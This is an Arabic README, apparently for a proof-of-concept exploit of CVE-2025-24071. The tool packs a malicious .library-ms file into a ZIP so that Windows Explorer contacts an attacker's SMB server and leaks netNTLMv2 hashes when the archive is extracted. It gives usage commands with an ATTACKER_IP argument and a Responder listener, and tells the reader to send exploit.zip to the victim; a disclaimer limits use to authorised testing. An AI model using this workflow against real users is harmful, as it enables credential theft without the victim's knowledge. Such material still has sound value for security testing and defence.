
يُنشئ ملف ZIP يستغل ثغرة CVE-2025-24071 لالتقاط بيانات اعتماد netNTLMv2 من مستكشف Windows عبر ملفات .library-ms خبيثة، وهو مخصص للاختبارات الخاضعة للرقابة.
تم تصميم هذا السكربت بلغة Python لتوضيح الثغرة الأمنية CVE-2025-24071 في مستكشف ويندوز (Windows Explorer). تتيح هذه الثغرة للمهاجم التقاط بيانات اعتماد netNTLMv2 من الضحية دون أي تفاعل مباشر من الضحية.
توجد الثغرة الأمنية CVE-2025-24071 في الطريقة التي يتعامل بها ويندوز مع ملفات .library-ms داخل أرشيفات ZIP. عند استخراج ملف ZIP يحتوي على ملف .library-ms خبيث، يحاول ويندوز تلقائيًا الوصول إلى موقع SMB محدد في الملف، مما قد يؤدي إلى كشف بيانات اعتماد الضحية لخادم المهاجم.
ينشئ هذا السكربت ملف ZIP يحتوي على ملف .library-ms خبيث. عندما يستخرج الضحية ملف ZIP، يحاول النظام تلقائيًا الاتصال بموقع SMB المحدد في الملف، مما يرسل بيانات اعتماد netNTLMv2 إلى المهاجم دون أي تفاعل من الضحية.
يأخذ السكربت عنوان IP الخاص بالمهاجم كوسيط ويدرجه في ملف XML يعرّف ملف .library-ms. يوجه هذا الملف ويندوز للاتصال بموارد مشتركة على عنوان IP الخاص بالمهاجم.
يتم بعد ذلك وضع ملف .library-ms داخل ملف ZIP باسم exploit.zip.
عندما يستخرج الضحية ملف ZIP، يعالج ويندوز ملف .library-ms، ونتيجةً للثغرة، يقوم تلقائيًا بإنشاء اتصال SMB بخادم المهاجم.
يمكن للمهاجم التقاط بيانات اعتماد netNTLMv2 باستخدام أدوات مثل Responder، دون أن يحتاج الضحية إلى اتخاذ أي إجراء.
zipfile, os, argparsepython exploit.py --ip <ATTACKER_IP>
responder -I <INTERFACE>
أرسل ملف exploit.zip المُنشأ إلى الضحية. عند استخراج الملف، سيحاول ويندوز الاتصال بخادم SMB المحدد في ملف .library-ms.
بمجرد استخراج الضحية لملف ZIP ومحاولة ويندوز الاتصال عبر SMB، سيقوم Responder بالتقاط هاشات netNTLMv2 من الضحية.
هذا السكربت مخصص للأغراض التعليمية والاختبارية في بيئات خاضعة للتحكم. قد يكون الاستخدام الخبيث لهذه الثغرة غير قانوني ومخالفًا لقوانين وأنظمة العديد من البلدان. استخدم هذا السكربت فقط على الأنظمة التي لديك إذن بتدقيقها ودائمًا بتفويض مناسب.